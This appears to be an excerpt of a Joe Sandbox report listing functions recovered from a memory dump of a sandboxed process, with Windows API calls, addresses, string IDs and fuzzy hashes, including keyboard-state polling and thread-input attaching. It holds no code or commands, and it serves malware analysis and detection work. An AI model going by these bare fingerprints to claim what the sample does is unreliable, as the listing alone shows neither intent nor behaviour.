                                                    • API String ID: 4176008265-0
                                                    • Opcode ID: 86fbc593f422486c9f50a1c1c0470dc21f1be70d269608be0158d711b8dcc9a0
                                                    • Instruction ID: b2cbbec25b9f3c5028045be8f049ed6d1b64fde9c5ad65be1784385ac3348e90
                                                    • Opcode Fuzzy Hash: 86fbc593f422486c9f50a1c1c0470dc21f1be70d269608be0158d711b8dcc9a0
                                                    • Instruction Fuzzy Hash: 2761B171900249AFDB91DF64CC89ABEBBB8EB42316F140259FE41A7251D735AD09FB20
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F775CA
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F775CD
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F775F1
                                                    • _memset.LIBCMT ref: 00F77602
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F77614
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F7768C
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow_memset
                                                    • String ID:
                                                    • API String ID: 830647256-0
                                                    • Opcode ID: 6f55cea2c74b61f2246e4e44ba9858466cdd3a721f88948fb501d1eb96dccd88
                                                    • Instruction ID: c455e470236b32ce760a0066b2b74affb59dc42a70e49eb6745f8bc978831671
                                                    • Opcode Fuzzy Hash: 6f55cea2c74b61f2246e4e44ba9858466cdd3a721f88948fb501d1eb96dccd88
                                                    • Instruction Fuzzy Hash: 21618C75900308AFDB10EF64CC81EEE77F8AB49710F24419AFA18A72A1D770AD41EF61
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F477DD
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00F47836
                                                    • VariantInit.OLEAUT32(?), ref: 00F47848
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F47868
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00F478BB
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F478CF
                                                    • VariantClear.OLEAUT32(?), ref: 00F478E4
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00F478F1
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F478FA
                                                    • VariantClear.OLEAUT32(?), ref: 00F4790C
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F47917
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: 174633601617db1bd4a94f52da11126a42e70e3fe9479605da7775390d6215e2
                                                    • Instruction ID: 50a676a30990be7a08c54703536d1b15bcc9340a22e622be3af4edb1d2b3376f
                                                    • Opcode Fuzzy Hash: 174633601617db1bd4a94f52da11126a42e70e3fe9479605da7775390d6215e2
                                                    • Instruction Fuzzy Hash: 26415075A0021D9FDB00EFA4CC489EDBFB9FF08310F408069EA55A7261DB35A949DF90
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00F50530
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00F505B1
                                                    • GetKeyState.USER32(000000A0), ref: 00F505CC
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00F505E6
                                                    • GetKeyState.USER32(000000A1), ref: 00F505FB
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00F50613
                                                    • GetKeyState.USER32(00000011), ref: 00F50625
                                                    • GetAsyncKeyState.USER32(00000012), ref: 00F5063D
                                                    • GetKeyState.USER32(00000012), ref: 00F5064F
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00F50667
                                                    • GetKeyState.USER32(0000005B), ref: 00F50679
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 21bc0d8dd066a91aa82e2a5d66176143fefa8dae0732e8109bbb6460b4d7a58d
                                                    • Instruction ID: 4752ae08d62bb9568222ba3b774c234de3c81a7a81a3b3d31a8302416b9aae26
                                                    • Opcode Fuzzy Hash: 21bc0d8dd066a91aa82e2a5d66176143fefa8dae0732e8109bbb6460b4d7a58d
                                                    • Instruction Fuzzy Hash: 7841B230D047CA6DFF708A6488047B5BEA06F51325F4C405ADFC64B5C2EEA499DCAFA2
                                                    APIs
                                                      • Part of subcall function 00EF4D37: __itow.LIBCMT ref: 00EF4D62
                                                      • Part of subcall function 00EF4D37: __swprintf.LIBCMT ref: 00EF4DAC
                                                    • CoInitialize.OLE32 ref: 00F68AED
                                                    • CoUninitialize.OLE32 ref: 00F68AF8
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00F83BBC,?), ref: 00F68B58
                                                    • IIDFromString.OLE32(?,?), ref: 00F68BCB
                                                    • VariantInit.OLEAUT32(?), ref: 00F68C65
                                                    • VariantClear.OLEAUT32(?), ref: 00F68CC6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 834269672-1287834457
                                                    • Opcode ID: e6fa326c510f22a399b5f05f48c178a793ed084b30f10b4a279ddf4c1c378ba3
                                                    • Instruction ID: fad2da5c4933c3dc28f64851c23f7a52235b492d59fc907cccdd68e36436ddf2
                                                    • Opcode Fuzzy Hash: e6fa326c510f22a399b5f05f48c178a793ed084b30f10b4a279ddf4c1c378ba3
                                                    • Instruction Fuzzy Hash: 6861B0B16087119FC710DF14C889F6ABBE8EF85794F00090DF9819B291CB74ED49EBA2
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F5BB13
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F5BB89
                                                    • GetLastError.KERNEL32 ref: 00F5BB93
                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00F5BC00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: e72ad2ee3a3611a04c194210407b4e82362f72d0c06df8be2622a65fa3f3ef74
                                                    • Instruction ID: 656674cdb596e5606ab14c4b5c7ce6c563420a3d71202957fdb0c6a9dcf538f8
                                                    • Opcode Fuzzy Hash: e72ad2ee3a3611a04c194210407b4e82362f72d0c06df8be2622a65fa3f3ef74
                                                    • Instruction Fuzzy Hash: E831D235A00209AFCB10DF68CC45EBEB7B4EF85311F108025EE05E72D6DBB59909EB91
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00F4B7BD
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F49BCC
                                                    • GetDlgCtrlID.USER32 ref: 00F49BD7
                                                    • GetParent.USER32 ref: 00F49BF3
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F49BF6
                                                    • GetDlgCtrlID.USER32(?), ref: 00F49BFF
                                                    • GetParent.USER32(?), ref: 00F49C1B
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F49C1E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1536045017-1403004172
                                                    • Opcode ID: 7463fbc521870c0253d40f4db5762bb635a862b75e7e02253a5c7d23e2c0fd17
                                                    • Instruction ID: 3b9fc17168ab49737c562eb693304b7222171e261c9c93897b8bbc7b1cba8e1e
                                                    • Opcode Fuzzy Hash: 7463fbc521870c0253d40f4db5762bb635a862b75e7e02253a5c7d23e2c0fd17
                                                    • Instruction Fuzzy Hash: 4221AE75E00109ABDF04AB60CC85EFEBBA9EF95310F100115F961932D1EB788919BB20
                                                    APIs
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                      • Part of subcall function 00F4B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00F4B7BD
                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F49CB5
                                                    • GetDlgCtrlID.USER32 ref: 00F49CC0
                                                    • GetParent.USER32 ref: 00F49CDC
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F49CDF
                                                    • GetDlgCtrlID.USER32(?), ref: 00F49CE8
                                                    • GetParent.USER32(?), ref: 00F49D04
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F49D07
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1536045017-1403004172
                                                    • Opcode ID: 02bfaeea75faaac963148decda36df17f9fa77f82cc9eb7300c8411584718eb3
                                                    • Instruction ID: 51b5760e1f25dcfe351968003f1c762eef76c1fc3d874a445a80be35515d290e
                                                    • Opcode Fuzzy Hash: 02bfaeea75faaac963148decda36df17f9fa77f82cc9eb7300c8411584718eb3
                                                    • Instruction Fuzzy Hash: B421AF75E40109BFDF10ABA0CC85EFEBBB9EF95300F100115B95197292EB798929FB20
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00F68FC1
                                                    • CoInitialize.OLE32(00000000), ref: 00F68FEE
                                                    • CoUninitialize.OLE32 ref: 00F68FF8
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00F690F8
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F69225
                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F83BDC), ref: 00F69259
                                                    • CoGetObject.OLE32(?,00000000,00F83BDC,?), ref: 00F6927C
                                                    • SetErrorMode.KERNEL32(00000000), ref: 00F6928F
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F6930F
                                                    • VariantClear.OLEAUT32(?), ref: 00F6931F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                    • String ID:
                                                    • API String ID: 2395222682-0
                                                    • Opcode ID: effbae446dfdff930fc64bd7d5d62d62dc9f8b5112dc96d850b639365eec7d61
                                                    • Instruction ID: d8b4dcaae6b2741188c61528c80c6dabdad6818bfb8620d7ef89c22e9f7b947e
                                                    • Opcode Fuzzy Hash: effbae446dfdff930fc64bd7d5d62d62dc9f8b5112dc96d850b639365eec7d61
                                                    • Instruction Fuzzy Hash: 7DC144B1608305AFC700EF64C88496BB7E9FF89748F10491DF98A9B251DBB1ED06DB52
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00F519EF
                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F50A67,?,00000001), ref: 00F51A03
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00F51A0A
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F50A67,?,00000001), ref: 00F51A19
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F51A2B
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F50A67,?,00000001), ref: 00F51A44
                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F50A67,?,00000001), ref: 00F51A56
                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F50A67,?,00000001), ref: 00F51A9B
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F50A67,?,00000001), ref: 00F51AB0
                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F50A67,?,00000001), ref: 00F51ABB
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                    • String ID:
                                                    • API String ID: 2156557900-0
                                                    • Opcode ID: 8cb3b5305867bfb943327582d8df1c53c8f02fb0eb9d5f640ce3e8693553a134
                                                    • Instruction ID: 47b70d1161221197bf9cf73795417a278e441aae99d612859affbcc259f43409
                                                    • Opcode Fuzzy Hash: 8cb3b5305867bfb943327582d8df1c53c8f02fb0eb9d5f640ce3e8693553a134
                                                    • Instruction Fuzzy Hash: 7031B176901248AFDB219F14DC84BB977ADFB94366F114215FE00C6191DB78AD48EF50
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 00EF260D
                                                    • SetTextColor.GDI32(?,000000FF), ref: 00EF2617
                                                    • SetBkMode.GDI32(?,00000001), ref: 00EF262C
                                                    • GetStockObject.GDI32(00000005), ref: 00EF2634
                                                    • GetClientRect.USER32(?), ref: 00F2C0FC
                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F2C113
                                                    • GetWindowDC.USER32(?), ref: 00F2C11F
                                                    • GetPixel.GDI32(00000000,?,?), ref: 00F2C12E
                                                    • ReleaseDC.USER32(?,00000000), ref: 00F2C140
                                                    • GetSysColor.USER32(00000005), ref: 00F2C15E
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                    • String ID:
                                                    • API String ID: 3430376129-0
                                                    • Opcode ID: bfdf50c7af8792198814db061fd7a46a823f7a8214f188af15445e4b81b82f40
                                                    • Instruction ID: 9627f4da952c2c5980cfaaa8cedf709951b8080918ab963c21f264cb4ec7258f
                                                    • Opcode Fuzzy Hash: bfdf50c7af8792198814db061fd7a46a823f7a8214f188af15445e4b81b82f40
                                                    • Instruction Fuzzy Hash: 33115932500209AFDBA15FA4EC49BF97BA1EF08331F504225FA65990E1CF310955FF61
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EFADE1
                                                    • OleUninitialize.OLE32(?,00000000), ref: 00EFAE80
                                                    • UnregisterHotKey.USER32(?), ref: 00EFAFD7
                                                    • DestroyWindow.USER32(?), ref: 00F32F64
                                                    • FreeLibrary.KERNEL32(?), ref: 00F32FC9
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F32FF6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    • Opcode ID: 6dd1565b6d6c4bfd061095e406665094a59bcd63aba9697ad412b13d4cfdfaba
                                                    • Instruction ID: 8d2febd310b0090ca3833b858399764229eaabf0b87171e66e93c0a88214178c
                                                    • Opcode Fuzzy Hash: 6dd1565b6d6c4bfd061095e406665094a59bcd63aba9697ad412b13d4cfdfaba
                                                    • Instruction Fuzzy Hash: 1CA17DB1701216CFCB29EF24C895A79F764BF04724F1442ACE90AAB251CF31AD56EF91
                                                    APIs
                                                    • EnumChildWindows.USER32(?,00F4B13A), ref: 00F4B078
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 3555792229-1603158881
                                                    • Opcode ID: 69345e248186c83e75090cc0d6f78c7add714b8e924e234e996f6075ec107c36
                                                    • Instruction ID: 8a193be5c2c9fd0e112aa562487cb91e76ad6a904652def64db5602e1227b6ee
                                                    • Opcode Fuzzy Hash: 69345e248186c83e75090cc0d6f78c7add714b8e924e234e996f6075ec107c36
                                                    • Instruction Fuzzy Hash: 44915371900506DADB18EF60C881BEAFB75BF04310F548119EC6AA7292DF34A999FB91
                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00EF327E
                                                      • Part of subcall function 00EF218F: GetClientRect.USER32(?,?), ref: 00EF21B8
                                                      • Part of subcall function 00EF218F: GetWindowRect.USER32(?,?), ref: 00EF21F9
                                                      • Part of subcall function 00EF218F: ScreenToClient.USER32(?,?), ref: 00EF2221
                                                    • GetDC.USER32 ref: 00F2D073
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F2D086
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F2D094
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00F2D0A9
                                                    • ReleaseDC.USER32(?,00000000), ref: 00F2D0B1
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F2D13C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                    • String ID: U
                                                    • API String ID: 4009187628-3372436214
                                                    • Opcode ID: 8ece3469c80271ba21073dfc8466eafb156fa4edf33c642a7a7bebfc5fdd7e83
                                                    • Instruction ID: d611dff41a1e87e73548a1fa060898aae88a7cdc7a917ce5221a3f78d0b20c2a
                                                    • Opcode Fuzzy Hash: 8ece3469c80271ba21073dfc8466eafb156fa4edf33c642a7a7bebfc5fdd7e83
                                                    • Instruction Fuzzy Hash: C6710330804209DFDF21CF64DC84AFA7BB5FF49320F244269EE556A1AAC7318951EF60
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                      • Part of subcall function 00EF2714: GetCursorPos.USER32(?), ref: 00EF2727
                                                      • Part of subcall function 00EF2714: ScreenToClient.USER32(00FB77B0,?), ref: 00EF2744
                                                      • Part of subcall function 00EF2714: GetAsyncKeyState.USER32(00000001), ref: 00EF2769
                                                      • Part of subcall function 00EF2714: GetAsyncKeyState.USER32(00000002), ref: 00EF2777
                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00F7C69C
                                                    • ImageList_EndDrag.COMCTL32 ref: 00F7C6A2
                                                    • ReleaseCapture.USER32 ref: 00F7C6A8
                                                    • SetWindowTextW.USER32(?,00000000), ref: 00F7C752
                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00F7C765
                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00F7C847
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
